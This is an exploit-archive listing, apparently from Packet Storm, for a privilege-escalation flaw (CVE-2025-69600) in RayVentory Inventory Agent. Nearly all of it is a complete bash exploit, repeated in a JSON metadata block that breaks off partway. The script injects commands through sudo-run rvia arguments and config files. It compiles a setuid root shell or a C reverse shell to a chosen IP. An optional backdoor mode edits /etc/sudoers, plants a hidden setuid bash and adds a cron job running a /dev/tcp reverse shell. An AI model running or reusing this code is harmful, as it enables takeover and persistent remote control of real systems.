📄 Raynet rvia 2.6.4392.49-amd64.deb Privilege Escalation_PACKETSTORM:215862

Description

Proof of concept privilege escalation exploit for Raynet's RayVentory Inventory Agent version 2.6.4392.49-amd64.deb...

Basic Information

ID PACKETSTORM:215862

Published Feb 19, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Raynet rvia 2.6.4392.49-amd64.deb Privilege Escalation Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://raynet.de/ |
=============================================================================================================================================

[+] Summary : A privilege escalation vulnerability identified as CVE-2025-69600 affects certain versions of RayVentory Inventory Agent.
The issue arises from improper validation and insufficient restriction of privileged operations when executed through sudo configurations.
Under specific misconfigurations, a local authenticated user may be able to execute unintended commands with elevated privileges.
Successful exploitation could lead to full system compromise, including unauthorized modification of system files and persistence mechanisms.
Organizations using affected versions should review sudo configurations, restrict command execution scopes, and upgrade to a patched version as recommended by the vendor

[+] POC :

#!/bin/bash

RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
NC='\033[0m'
VULNERABLE_VERSION="12.6.4392.49"
TARGET_DIR="/tmp"
PAYLOAD_NAME="rootme_$$" # Added PID to avoid conflict
BACKUP_DIR="/tmp/.rvia_backup_$$"
LISTENER_PORT="4444"
CVE_NUMBER="CVE-2025-69600"
REVERSE_IP=""
REVERSE_PORT="4444"
LISTENER_PID=""
CLEANUP_NEEDED=false
EXPLOIT_SUCCESS=false

show_help() {
cat << EOF
Exploit for $CVE_NUMBER - RayVentory Inventory Agent
Optimized Version 3.0

Usage: $0 [options]

Options:
-c, --check Only check for vulnerability
-e, --exploit Attempt local exploitation
-r, --reverse IP Reverse Shell (Example: -r 192.168.1.100)
-p, --port PORT Port (Default: 4444)
-b, --backdoor IP Install persistent backdoor
-h, --help Show help

Examples:
$0 -c
$0 -e
$0 -r 192.168.1.100 -p 5555
$0 -b 192.168.1.100
EOF
exit 0
}

cleanup() {
if [ "$CLEANUP_NEEDED" = true ]; then
echo -e "\n${YELLOW}[*] Cleaning up temporary files...${NC}"

rm -f "/tmp/$PAYLOAD_NAME" 2>/dev/null
rm -f "/tmp/$PAYLOAD_NAME.c" 2>/dev/null
rm -f "/tmp/malicious_$$.cfg" 2>/dev/null

if [ -d "/tmp/bin_$$" ]; then
rm -rf "/tmp/bin_$$" 2>/dev/null
fi

if [ -f "$BACKUP_DIR/rvia.cfg" ]; then
if [ -f "/opt/rvia/rvia.cfg" ]; then
cp "$BACKUP_DIR/rvia.cfg" "/opt/rvia/rvia.cfg" 2>/dev/null
fi
rm -rf "$BACKUP_DIR" 2>/dev/null
echo -e "${GREEN}[OK] Configuration file restored${NC}"
fi
if [ -n "$LISTENER_PID" ] && kill -0 "$LISTENER_PID" 2>/dev/null; then
kill "$LISTENER_PID" 2>/dev/null
sleep 1
kill -9 "$LISTENER_PID" 2>/dev/null
fi

echo -e "${GREEN}[OK] Cleanup complete${NC}"
fi
exit 0
}

trap cleanup SIGINT SIGTERM EXIT

create_payload() {
local payload_type=$1
local payload_path="/tmp/${PAYLOAD_NAME}.c"
local gcc_output

echo -e "${BLUE}[*] Creating payload: $payload_type${NC}"

case $payload_type in
"suid")
cat > "$payload_path" << 'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
if (setuid(0) != 0) {
return 1;
}
if (setgid(0) != 0) {
return 1;
}
execl("/bin/bash", "bash", "-p", NULL);
return 0;
}
EOF
;;
"reverse")
if [ -z "$REVERSE_IP" ]; then
echo -e "${RED}[!] Reverse shell IP not specified${NC}"
return 1
fi
cat > "$payload_path" << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <fcntl.h>

int main() {
int sock;
struct sockaddr_in server;

sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0) return 1;

server.sin_family = AF_INET;
server.sin_port = htons($REVERSE_PORT);
server.sin_addr.s_addr = inet_addr("$REVERSE_IP");

if (connect(sock, (struct sockaddr *)&server, sizeof(server)) < 0) {
close(sock);
return 1;
}

dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);

execl("/bin/bash", "bash", NULL);
return 0;
}
EOF
;;
"backdoor")
if [ -z "$REVERSE_IP" ]; then
echo -e "${RED}[!] Backdoor IP not specified${NC}"
return 1
fi
cat > "$payload_path" << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>

int main() {
while(1) {
if (getuid() == 0) {
FILE *fp;
fp = fopen("/etc/sudoers", "a");
if (fp) {
fprintf(fp, "\\nroot ALL=(ALL:ALL) NOPASSWD:ALL\\n");
fclose(fp);
}
system("cp /bin/bash /tmp/.hidden_bash && chmod 4755 /tmp/.hidden_bash");
system("echo '*/5 * * * * root /tmp/.hidden_bash -c \"bash -i >& /dev/tcp/$REVERSE_IP/$REVERSE_PORT 0>&1\"' >> /etc/crontab");
break;
}
sleep(5);
}
return 0;
}
EOF
;;
*)
echo -e "${RED}[!] Unknown payload type: $payload_type${NC}"
return 1
;;
esac

if ! command -v gcc &> /dev/null; then
echo -e "${RED}[!] gcc is not installed${NC}"
return 1
fi

gcc_output=$(gcc -Wall "$payload_path" -o "/tmp/$PAYLOAD_NAME" 2>&1)
if [ $? -ne 0 ]; then
echo -e "${RED}[!] Failed to compile payload${NC}"
echo -e "${RED}$gcc_output${NC}"
return 1
fi

chmod +x "/tmp/$PAYLOAD_NAME"
echo -e "${GREEN}[OK] Payload created successfully: /tmp/$PAYLOAD_NAME${NC}"
CLEANUP_NEEDED=true
return 0
}

check_version() {
echo -e "${BLUE}[*] Checking RayVentory version...${NC}"

local version=""
local installed=false

if command -v dpkg &> /dev/null; then
version=$(dpkg -l 2>/dev/null | grep rvia | awk '{print $3}')
if [ -n "$version" ]; then
installed=true
fi
fi

if [ "$installed" = false ] && [ -f "/opt/rvia/rvia" ]; then
version=$(/opt/rvia/rvia --version 2>/dev/null | head -n1 | grep -oE '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+')
if [ -n "$version" ]; then
installed=true
fi
fi

if [ "$installed" = false ]; then
echo -e "${RED}[!] RayVentory is not installed on the system${NC}"
return 1
fi

echo -e "${GREEN}[OK] Installed version: $version${NC}"

if command -v dpkg &> /dev/null; then
if dpkg --compare-versions "$version" le "$VULNERABLE_VERSION" 2>/dev/null; then
echo -e "${GREEN}[OK] System is vulnerable to $CVE_NUMBER${NC}"
return 0
else
echo -e "${RED}[!] Version $version is newer than the known vulnerable version${NC}"
echo -e "${YELLOW}[!] System might not be vulnerable${NC}"
return 1
fi
else
echo -e "${YELLOW}[!] Cannot accurately verify vulnerability status${NC}"
echo -e "${YELLOW}[!] Proceeding with exploitation attempt at your own risk${NC}"
return 0
fi
}

check_sudo() {
echo -e "${BLUE}[*] Checking sudo privileges...${NC}"

if ! command -v sudo &> /dev/null; then
echo -e "${RED}[!] sudo is not installed${NC}"
return 1
fi

if ! sudo -n true 2>/dev/null; then
echo -e "${YELLOW}[!] sudo may require a password${NC}"
echo -e "${YELLOW}[*] Please enter password if prompted${NC}"
fi

local sudo_config=$(sudo -l 2>&1)

if echo "$sudo_config" | grep -q "sorry, a password is required"; then
echo -e "${RED}[!] sudo password required but not provided${NC}"
return 1
fi

if ! echo "$sudo_config" | grep -q "rvia"; then
echo -e "${RED}[!] No sudo privileges found for rvia${NC}"
return 1
fi

echo -e "${GREEN}[OK] sudo privileges exist${NC}"

local patterns=(
"rvia[[:space:]]*\*"
"rvia[[:space:]]+getconfig"
"rvia[[:space:]]+upload"
"rvia[[:space:]]+inventory"
"rvia[[:space:]]+oracle"
"(root)[[:space:]]*"
"(ALL[[:space:]]*:[[:space:]]*ALL)"
"(ALL)[[:space:]]*"
)

local found=0
for pattern in "${patterns[@]}"; do
if echo "$sudo_config" | grep -qE "$pattern"; then
found=1
echo -e "${GREEN}[OK] Found exploitable pattern: $pattern${NC}"
break
fi
done

if [ $found -eq 1 ]; then
echo -e "${GREEN}[OK] Configuration is exploitable!${NC}"
return 0
else
echo -e "${YELLOW}[!] Configuration may not be directly exploitable${NC}"
return 0
fi
}

exploit_single_method() {
local method=$1
local cmd="/tmp/$PAYLOAD_NAME"
local temp_cfg="/tmp/malicious_$$.cfg"

echo -e "${BLUE}[*] Attempting exploit using: $method${NC}"

if [ ! -d "$BACKUP_DIR" ] && [ -f "/opt/rvia/rvia.cfg" ]; then
mkdir -p "$BACKUP_DIR"
cp "/opt/rvia/rvia.cfg" "$BACKUP_DIR/" 2>/dev/null
fi

case $method in
"getconfig")
sudo /opt/rvia/rvia getconfig \";$cmd;\" 2>/dev/null
;;
"upload")
mkdir -p "/opt/rvia/results" 2>/dev/null
touch "/opt/rvia/results/test_$$.xml" 2>/dev/null
sudo /opt/rvia/rvia upload \"\;$cmd\;#\" 2>/dev/null
;;
"inventory")
sudo /opt/rvia/rvia inventory \";$cmd;\" 2>/dev/null
;;
"oracle")

local bin_dir="/tmp/bin_$$"
mkdir -p "$bin_dir" 2>/dev/null
ln -sf "/tmp/$PAYLOAD_NAME" "$bin_dir/java" 2>/dev/null

cat > "$temp_cfg" << EOF
javaPaths=$bin_dir/
EOF
cp "$temp_cfg" "/opt/rvia/rvia.cfg" 2>/dev/null

sudo /opt/rvia/rvia oracle test 2>/dev/null
;;
"config")
cat > "$temp_cfg" << EOF
configDownloadSource=http://127.0.0.1:$LISTENER_PORT/malicious
schedule:command:$cmd * * * * *
EOF
cp "$temp_cfg" "/opt/rvia/rvia.cfg" 2>/dev/null

(
timeout 5 nc -l -p "$LISTENER_PORT" -q 1 2>/dev/null << EOF
HTTP/1.1 200 OK
Content-Type: text/plain

malicious
EOF
) &
LISTENER_PID=$!
sleep 2

sudo /opt/rvia/rvia getconfig 2>/dev/null
;;
esac

sleep 3
}

check_success() {
local payload="/tmp/$PAYLOAD_NAME"

if [ ! -f "$payload" ]; then
return 1
fi

if [ -u "$payload" ]; then
echo -e "${GREEN}[OK] Privilege escalation successful!${NC}"
echo -e "${GREEN}[OK] Launching root shell...${NC}"
EXPLOIT_SUCCESS=true
"$payload"
return 0
fi

if command -v stat &> /dev/null; then
local perms=$(stat -c "%A" "$payload" 2>/dev/null)
if [[ $perms == *s* ]]; then
echo -e "${GREEN}[OK] Privilege escalation successful (stat)!${NC}"
EXPLOIT_SUCCESS=true
"$payload"
return 0
fi
fi

return 1
}

try_all_methods() {
local methods=("getconfig" "upload" "inventory" "oracle" "config")
local success=1

for method in "${methods[@]}"; do
exploit_single_method "$method"

if check_success; then
success=0
break
fi

# Restore configuration file after each failed attempt
if [ -f "$BACKUP_DIR/rvia.cfg" ]; then
cp "$BACKUP_DIR/rvia.cfg" "/opt/rvia/rvia.cfg" 2>/dev/null
fi
done

return $success
}

install_backdoor() {
echo -e "${BLUE}[*] Installing persistent backdoor...${NC}"

if [ -z "$REVERSE_IP" ]; then
echo -e "${RED}[!] Backdoor IP must be specified${NC}"
return 1
fi

if create_payload "backdoor"; then
if try_all_methods; then
echo -e "${GREEN}[OK] Backdoor installed successfully${NC}"
echo -e "${YELLOW}[*] Reverse shell to $REVERSE_IP:$REVERSE_PORT every 5 minutes${NC}"
return 0
else
echo -e "${RED}[!] Failed to install backdoor${NC}"
return 1
fi
fi
}

main() {

local CHECK_ONLY=false
local EXPLOIT=false
local BACKDOOR=false
local REVERSE=false

while [[ $# -gt 0 ]]; do
case $1 in
-c|--check)
CHECK_ONLY=true
shift
;;
-e|--exploit)
EXPLOIT=true
shift
;;
-r|--reverse)
REVERSE=true
if [ -z "$2" ] || [[ "$2" =~ ^- ]]; then
echo -e "${RED}[!] IP required for reverse shell${NC}"
exit 1
fi
REVERSE_IP="$2"
shift 2
;;
-p|--port)
if [ -z "$2" ] || [[ "$2" =~ ^- ]]; then
echo -e "${RED}[!] Port number required${NC}"
exit 1
fi
if ! [[ "$2" =~ ^[0-9]+$ ]] || [ "$2" -lt 1 ] || [ "$2" -gt 65535 ]; then
echo -e "${RED}[!] Invalid port: $2${NC}"
exit 1
fi
REVERSE_PORT="$2"
shift 2
;;
-b|--backdoor)
BACKDOOR=true
if [ -z "$2" ] || [[ "$2" =~ ^- ]]; then
echo -e "${RED}[!] IP required for backdoor${NC}"
exit 1
fi
REVERSE_IP="$2"
shift 2
;;
-h|--help)
show_help
;;
*)
echo -e "${RED}Unknown option: $1${NC}"
show_help
;;
esac
done

if [ ! -f "/opt/rvia/rvia" ]; then
echo -e "${RED}[!] RayVentory is not installed at /opt/rvia/rvia${NC}"
exit 1
fi

if [ "$CHECK_ONLY" = true ]; then
check_version && check_sudo
exit $?
fi

if [ "$BACKDOOR" = true ]; then
check_version && check_sudo && install_backdoor
exit $?
fi

if [ "$REVERSE" = true ]; then
check_version && check_sudo && create_payload "reverse" && try_all_methods
if [ $? -eq 0 ] && [ "$EXPLOIT_SUCCESS" = false ]; then
echo -e "${RED}[!] Exploit failed${NC}"
exit 1
fi
exit 0
fi

if [ "$EXPLOIT" = true ]; then
check_version && check_sudo && create_payload "suid" && try_all_methods
if [ $? -eq 0 ] && [ "$EXPLOIT_SUCCESS" = false ]; then
echo -e "${RED}[!] Exploit failed${NC}"
exit 1
fi
exit 0
fi

show_help
}

main "$@"

Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================

{
    "lastseen": "2026-02-19T16:34:02",
    "description": "Proof of concept privilege escalation exploit for Raynet's RayVentory Inventory Agent version 2.6.4392.49-amd64.deb...",
    "published": "2026-02-19T00:00:00",
    "modified": "2026-02-19T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Raynet rvia 2.6.4392.49-amd64.deb Privilege Escalation",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215862",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-69600"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Raynet rvia 2.6.4392.49-amd64.deb Privilege Escalation Vulnerability                                                        |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |\n    | # Vendor    : https://raynet.de/                                                                                                          |\n    =============================================================================================================================================\n    \n    [+] Summary    :  A privilege escalation vulnerability identified as CVE-2025-69600 affects certain versions of RayVentory Inventory Agent. \n                      The issue arises from improper validation and insufficient restriction of privileged operations when executed through sudo configurations. \n    \t\t\t\t  Under specific misconfigurations, a local authenticated user may be able to execute unintended commands with elevated privileges.\n                      Successful exploitation could lead to full system compromise, including unauthorized modification of system files and persistence mechanisms. \n    \t\t\t\t  Organizations using affected versions should review sudo configurations, restrict command execution scopes, and upgrade to a patched version as recommended by the vendor\n    \n    [+] POC : \n    \n    #!/bin/bash\n    \n    RED='\\033[0;31m'\n    GREEN='\\033[0;32m'\n    YELLOW='\\033[1;33m'\n    BLUE='\\033[0;34m'\n    NC='\\033[0m'\n    VULNERABLE_VERSION=\"12.6.4392.49\"\n    TARGET_DIR=\"/tmp\"\n    PAYLOAD_NAME=\"rootme_$$\"  # Added PID to avoid conflict\n    BACKUP_DIR=\"/tmp/.rvia_backup_$$\"\n    LISTENER_PORT=\"4444\"\n    CVE_NUMBER=\"CVE-2025-69600\"\n    REVERSE_IP=\"\"\n    REVERSE_PORT=\"4444\"\n    LISTENER_PID=\"\"\n    CLEANUP_NEEDED=false\n    EXPLOIT_SUCCESS=false\n    \n    show_help() {\n        cat << EOF\n    Exploit for $CVE_NUMBER - RayVentory Inventory Agent\n    Optimized Version 3.0\n    \n    Usage: $0 [options]\n    \n    Options:\n      -c, --check         Only check for vulnerability\n      -e, --exploit       Attempt local exploitation\n      -r, --reverse IP    Reverse Shell (Example: -r 192.168.1.100)\n      -p, --port PORT     Port (Default: 4444)\n      -b, --backdoor IP   Install persistent backdoor\n      -h, --help          Show help\n    \n    Examples:\n      $0 -c\n      $0 -e\n      $0 -r 192.168.1.100 -p 5555\n      $0 -b 192.168.1.100\n    EOF\n        exit 0\n    }\n    \n    cleanup() {\n        if [ \"$CLEANUP_NEEDED\" = true ]; then\n            echo -e \"\\n${YELLOW}[*] Cleaning up temporary files...${NC}\"\n    \n            rm -f \"/tmp/$PAYLOAD_NAME\" 2>/dev/null\n            rm -f \"/tmp/$PAYLOAD_NAME.c\" 2>/dev/null\n            rm -f \"/tmp/malicious_$$.cfg\" 2>/dev/null\n    \n            if [ -d \"/tmp/bin_$$\" ]; then\n                rm -rf \"/tmp/bin_$$\" 2>/dev/null\n            fi\n    \n            if [ -f \"$BACKUP_DIR/rvia.cfg\" ]; then\n                if [ -f \"/opt/rvia/rvia.cfg\" ]; then\n                    cp \"$BACKUP_DIR/rvia.cfg\" \"/opt/rvia/rvia.cfg\" 2>/dev/null\n                fi\n                rm -rf \"$BACKUP_DIR\" 2>/dev/null\n                echo -e \"${GREEN}[OK] Configuration file restored${NC}\"\n            fi\n            if [ -n \"$LISTENER_PID\" ] && kill -0 \"$LISTENER_PID\" 2>/dev/null; then\n                kill \"$LISTENER_PID\" 2>/dev/null\n                sleep 1\n                kill -9 \"$LISTENER_PID\" 2>/dev/null\n            fi\n            \n            echo -e \"${GREEN}[OK] Cleanup complete${NC}\"\n        fi\n        exit 0\n    }\n    \n    trap cleanup SIGINT SIGTERM EXIT\n    \n    create_payload() {\n        local payload_type=$1\n        local payload_path=\"/tmp/${PAYLOAD_NAME}.c\"\n        local gcc_output\n        \n        echo -e \"${BLUE}[*] Creating payload: $payload_type${NC}\"\n        \n        case $payload_type in\n            \"suid\")\n                cat > \"$payload_path\" << 'EOF'\n    #include <stdio.h>\n    #include <stdlib.h>\n    #include <unistd.h>\n    \n    int main() {\n        if (setuid(0) != 0) {\n            return 1;\n        }\n        if (setgid(0) != 0) {\n            return 1;\n        }\n        execl(\"/bin/bash\", \"bash\", \"-p\", NULL);\n        return 0;\n    }\n    EOF\n                ;;\n            \"reverse\")\n                if [ -z \"$REVERSE_IP\" ]; then\n                    echo -e \"${RED}[!] Reverse shell IP not specified${NC}\"\n                    return 1\n                fi\n                cat > \"$payload_path\" << EOF\n    #include <stdio.h>\n    #include <stdlib.h>\n    #include <unistd.h>\n    #include <sys/socket.h>\n    #include <arpa/inet.h>\n    #include <fcntl.h>\n    \n    int main() {\n        int sock;\n        struct sockaddr_in server;\n        \n        sock = socket(AF_INET, SOCK_STREAM, 0);\n        if (sock < 0) return 1;\n        \n        server.sin_family = AF_INET;\n        server.sin_port = htons($REVERSE_PORT);\n        server.sin_addr.s_addr = inet_addr(\"$REVERSE_IP\");\n        \n        if (connect(sock, (struct sockaddr *)&server, sizeof(server)) < 0) {\n            close(sock);\n            return 1;\n        }\n        \n        dup2(sock, 0);\n        dup2(sock, 1);\n        dup2(sock, 2);\n        \n        execl(\"/bin/bash\", \"bash\", NULL);\n        return 0;\n    }\n    EOF\n                ;;\n            \"backdoor\")\n                if [ -z \"$REVERSE_IP\" ]; then\n                    echo -e \"${RED}[!] Backdoor IP not specified${NC}\"\n                    return 1\n                fi\n                cat > \"$payload_path\" << EOF\n    #include <stdio.h>\n    #include <stdlib.h>\n    #include <unistd.h>\n    #include <time.h>\n    \n    int main() {\n        while(1) {\n            if (getuid() == 0) {\n                FILE *fp;\n                fp = fopen(\"/etc/sudoers\", \"a\");\n                if (fp) {\n                    fprintf(fp, \"\\\\nroot ALL=(ALL:ALL) NOPASSWD:ALL\\\\n\");\n                    fclose(fp);\n                }\n                system(\"cp /bin/bash /tmp/.hidden_bash && chmod 4755 /tmp/.hidden_bash\");\n                system(\"echo '*/5 * * * * root /tmp/.hidden_bash -c \\\"bash -i >& /dev/tcp/$REVERSE_IP/$REVERSE_PORT 0>&1\\\"' >> /etc/crontab\");\n                break;\n            }\n            sleep(5);\n        }\n        return 0;\n    }\n    EOF\n                ;;\n            *)\n                echo -e \"${RED}[!] Unknown payload type: $payload_type${NC}\"\n                return 1\n                ;;\n        esac\n    \n        if ! command -v gcc &> /dev/null; then\n            echo -e \"${RED}[!] gcc is not installed${NC}\"\n            return 1\n        fi\n    \n        gcc_output=$(gcc -Wall \"$payload_path\" -o \"/tmp/$PAYLOAD_NAME\" 2>&1)\n        if [ $? -ne 0 ]; then\n            echo -e \"${RED}[!] Failed to compile payload${NC}\"\n            echo -e \"${RED}$gcc_output${NC}\"\n            return 1\n        fi\n        \n        chmod +x \"/tmp/$PAYLOAD_NAME\"\n        echo -e \"${GREEN}[OK] Payload created successfully: /tmp/$PAYLOAD_NAME${NC}\"\n        CLEANUP_NEEDED=true\n        return 0\n    }\n    \n    check_version() {\n        echo -e \"${BLUE}[*] Checking RayVentory version...${NC}\"\n        \n        local version=\"\"\n        local installed=false\n    \n        if command -v dpkg &> /dev/null; then\n            version=$(dpkg -l 2>/dev/null | grep rvia | awk '{print $3}')\n            if [ -n \"$version\" ]; then\n                installed=true\n            fi\n        fi\n    \n        if [ \"$installed\" = false ] && [ -f \"/opt/rvia/rvia\" ]; then\n            version=$(/opt/rvia/rvia --version 2>/dev/null | head -n1 | grep -oE '[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+')\n            if [ -n \"$version\" ]; then\n                installed=true\n            fi\n        fi\n        \n        if [ \"$installed\" = false ]; then\n            echo -e \"${RED}[!] RayVentory is not installed on the system${NC}\"\n            return 1\n        fi\n        \n        echo -e \"${GREEN}[OK] Installed version: $version${NC}\"\n    \n        if command -v dpkg &> /dev/null; then\n            if dpkg --compare-versions \"$version\" le \"$VULNERABLE_VERSION\" 2>/dev/null; then\n                echo -e \"${GREEN}[OK] System is vulnerable to $CVE_NUMBER${NC}\"\n                return 0\n            else\n                echo -e \"${RED}[!] Version $version is newer than the known vulnerable version${NC}\"\n                echo -e \"${YELLOW}[!] System might not be vulnerable${NC}\"\n                return 1\n            fi\n        else\n            echo -e \"${YELLOW}[!] Cannot accurately verify vulnerability status${NC}\"\n            echo -e \"${YELLOW}[!] Proceeding with exploitation attempt at your own risk${NC}\"\n            return 0\n        fi\n    }\n    \n    check_sudo() {\n        echo -e \"${BLUE}[*] Checking sudo privileges...${NC}\"\n        \n        if ! command -v sudo &> /dev/null; then\n            echo -e \"${RED}[!] sudo is not installed${NC}\"\n            return 1\n        fi\n    \n        if ! sudo -n true 2>/dev/null; then\n            echo -e \"${YELLOW}[!] sudo may require a password${NC}\"\n            echo -e \"${YELLOW}[*] Please enter password if prompted${NC}\"\n        fi\n        \n        local sudo_config=$(sudo -l 2>&1)\n    \n        if echo \"$sudo_config\" | grep -q \"sorry, a password is required\"; then\n            echo -e \"${RED}[!] sudo password required but not provided${NC}\"\n            return 1\n        fi\n        \n        if ! echo \"$sudo_config\" | grep -q \"rvia\"; then\n            echo -e \"${RED}[!] No sudo privileges found for rvia${NC}\"\n            return 1\n        fi\n        \n        echo -e \"${GREEN}[OK] sudo privileges exist${NC}\"\n    \n        local patterns=(\n            \"rvia[[:space:]]*\\*\"\n            \"rvia[[:space:]]+getconfig\"\n            \"rvia[[:space:]]+upload\"\n            \"rvia[[:space:]]+inventory\"\n            \"rvia[[:space:]]+oracle\"\n            \"(root)[[:space:]]*\"\n            \"(ALL[[:space:]]*:[[:space:]]*ALL)\"\n            \"(ALL)[[:space:]]*\"\n        )\n        \n        local found=0\n        for pattern in \"${patterns[@]}\"; do\n            if echo \"$sudo_config\" | grep -qE \"$pattern\"; then\n                found=1\n                echo -e \"${GREEN}[OK] Found exploitable pattern: $pattern${NC}\"\n                break\n            fi\n        done\n        \n        if [ $found -eq 1 ]; then\n            echo -e \"${GREEN}[OK] Configuration is exploitable!${NC}\"\n            return 0\n        else\n            echo -e \"${YELLOW}[!] Configuration may not be directly exploitable${NC}\"\n            return 0\n        fi\n    }\n    \n    exploit_single_method() {\n        local method=$1\n        local cmd=\"/tmp/$PAYLOAD_NAME\"\n        local temp_cfg=\"/tmp/malicious_$$.cfg\"\n        \n        echo -e \"${BLUE}[*] Attempting exploit using: $method${NC}\"\n    \n        if [ ! -d \"$BACKUP_DIR\" ] && [ -f \"/opt/rvia/rvia.cfg\" ]; then\n            mkdir -p \"$BACKUP_DIR\"\n            cp \"/opt/rvia/rvia.cfg\" \"$BACKUP_DIR/\" 2>/dev/null\n        fi\n        \n        case $method in\n            \"getconfig\")\n                sudo /opt/rvia/rvia getconfig \\\";$cmd;\\\" 2>/dev/null\n                ;;\n            \"upload\")\n                mkdir -p \"/opt/rvia/results\" 2>/dev/null\n                touch \"/opt/rvia/results/test_$$.xml\" 2>/dev/null\n                sudo /opt/rvia/rvia upload \\\"\\;$cmd\\;#\\\" 2>/dev/null\n                ;;\n            \"inventory\")\n                sudo /opt/rvia/rvia inventory \\\";$cmd;\\\" 2>/dev/null\n                ;;\n            \"oracle\")\n    \n                local bin_dir=\"/tmp/bin_$$\"\n                mkdir -p \"$bin_dir\" 2>/dev/null\n                ln -sf \"/tmp/$PAYLOAD_NAME\" \"$bin_dir/java\" 2>/dev/null\n                \n                cat > \"$temp_cfg\" << EOF\n    javaPaths=$bin_dir/\n    EOF\n                cp \"$temp_cfg\" \"/opt/rvia/rvia.cfg\" 2>/dev/null\n                \n                sudo /opt/rvia/rvia oracle test 2>/dev/null\n                ;;\n            \"config\")\n                cat > \"$temp_cfg\" << EOF\n    configDownloadSource=http://127.0.0.1:$LISTENER_PORT/malicious\n    schedule:command:$cmd * * * * *\n    EOF\n                cp \"$temp_cfg\" \"/opt/rvia/rvia.cfg\" 2>/dev/null\n                \n                (\n                    timeout 5 nc -l -p \"$LISTENER_PORT\" -q 1 2>/dev/null << EOF\n    HTTP/1.1 200 OK\n    Content-Type: text/plain\n    \n    malicious\n    EOF\n                ) &\n                LISTENER_PID=$!\n                sleep 2\n                \n                sudo /opt/rvia/rvia getconfig 2>/dev/null\n                ;;\n        esac\n        \n        sleep 3\n    }\n    \n    check_success() {\n        local payload=\"/tmp/$PAYLOAD_NAME\"\n    \n        if [ ! -f \"$payload\" ]; then\n            return 1\n        fi\n    \n        if [ -u \"$payload\" ]; then\n            echo -e \"${GREEN}[OK] Privilege escalation successful!${NC}\"\n            echo -e \"${GREEN}[OK] Launching root shell...${NC}\"\n            EXPLOIT_SUCCESS=true\n            \"$payload\"\n            return 0\n        fi\n    \n        if command -v stat &> /dev/null; then\n            local perms=$(stat -c \"%A\" \"$payload\" 2>/dev/null)\n            if [[ $perms == *s* ]]; then\n                echo -e \"${GREEN}[OK] Privilege escalation successful (stat)!${NC}\"\n                EXPLOIT_SUCCESS=true\n                \"$payload\"\n                return 0\n            fi\n        fi\n        \n        return 1\n    }\n    \n    try_all_methods() {\n        local methods=(\"getconfig\" \"upload\" \"inventory\" \"oracle\" \"config\")\n        local success=1  \n        \n        for method in \"${methods[@]}\"; do\n            exploit_single_method \"$method\"\n            \n            if check_success; then\n                success=0  \n                break\n            fi\n            \n            # Restore configuration file after each failed attempt\n            if [ -f \"$BACKUP_DIR/rvia.cfg\" ]; then\n                cp \"$BACKUP_DIR/rvia.cfg\" \"/opt/rvia/rvia.cfg\" 2>/dev/null\n            fi\n        done\n        \n        return $success  \n    }\n    \n    \n    install_backdoor() {\n        echo -e \"${BLUE}[*] Installing persistent backdoor...${NC}\"\n        \n        if [ -z \"$REVERSE_IP\" ]; then\n            echo -e \"${RED}[!] Backdoor IP must be specified${NC}\"\n            return 1\n        fi\n        \n        if create_payload \"backdoor\"; then\n            if try_all_methods; then\n                echo -e \"${GREEN}[OK] Backdoor installed successfully${NC}\"\n                echo -e \"${YELLOW}[*] Reverse shell to $REVERSE_IP:$REVERSE_PORT every 5 minutes${NC}\"\n                return 0\n            else\n                echo -e \"${RED}[!] Failed to install backdoor${NC}\"\n                return 1\n            fi\n        fi\n    }\n    \n    main() {\n    \n        local CHECK_ONLY=false\n        local EXPLOIT=false\n        local BACKDOOR=false\n        local REVERSE=false\n    \n        while [[ $# -gt 0 ]]; do\n            case $1 in\n                -c|--check)\n                    CHECK_ONLY=true\n                    shift\n                    ;;\n                -e|--exploit)\n                    EXPLOIT=true\n                    shift\n                    ;;\n                -r|--reverse)\n                    REVERSE=true\n                    if [ -z \"$2\" ] || [[ \"$2\" =~ ^- ]]; then\n                        echo -e \"${RED}[!] IP required for reverse shell${NC}\"\n                        exit 1\n                    fi\n                    REVERSE_IP=\"$2\"\n                    shift 2\n                    ;;\n                -p|--port)\n                    if [ -z \"$2\" ] || [[ \"$2\" =~ ^- ]]; then\n                        echo -e \"${RED}[!] Port number required${NC}\"\n                        exit 1\n                    fi\n                    if ! [[ \"$2\" =~ ^[0-9]+$ ]] || [ \"$2\" -lt 1 ] || [ \"$2\" -gt 65535 ]; then\n                        echo -e \"${RED}[!] Invalid port: $2${NC}\"\n                        exit 1\n                    fi\n                    REVERSE_PORT=\"$2\"\n                    shift 2\n                    ;;\n                -b|--backdoor)\n                    BACKDOOR=true\n                    if [ -z \"$2\" ] || [[ \"$2\" =~ ^- ]]; then\n                        echo -e \"${RED}[!] IP required for backdoor${NC}\"\n                        exit 1\n                    fi\n                    REVERSE_IP=\"$2\"\n                    shift 2\n                    ;;\n                -h|--help)\n                    show_help\n                    ;;\n                *)\n                    echo -e \"${RED}Unknown option: $1${NC}\"\n                    show_help\n                    ;;\n            esac\n        done\n    \n        if [ ! -f \"/opt/rvia/rvia\" ]; then\n            echo -e \"${RED}[!] RayVentory is not installed at /opt/rvia/rvia${NC}\"\n            exit 1\n        fi\n    \n        if [ \"$CHECK_ONLY\" = true ]; then\n            check_version && check_sudo\n            exit $?\n        fi\n        \n        if [ \"$BACKDOOR\" = true ]; then\n            check_version && check_sudo && install_backdoor\n            exit $?\n        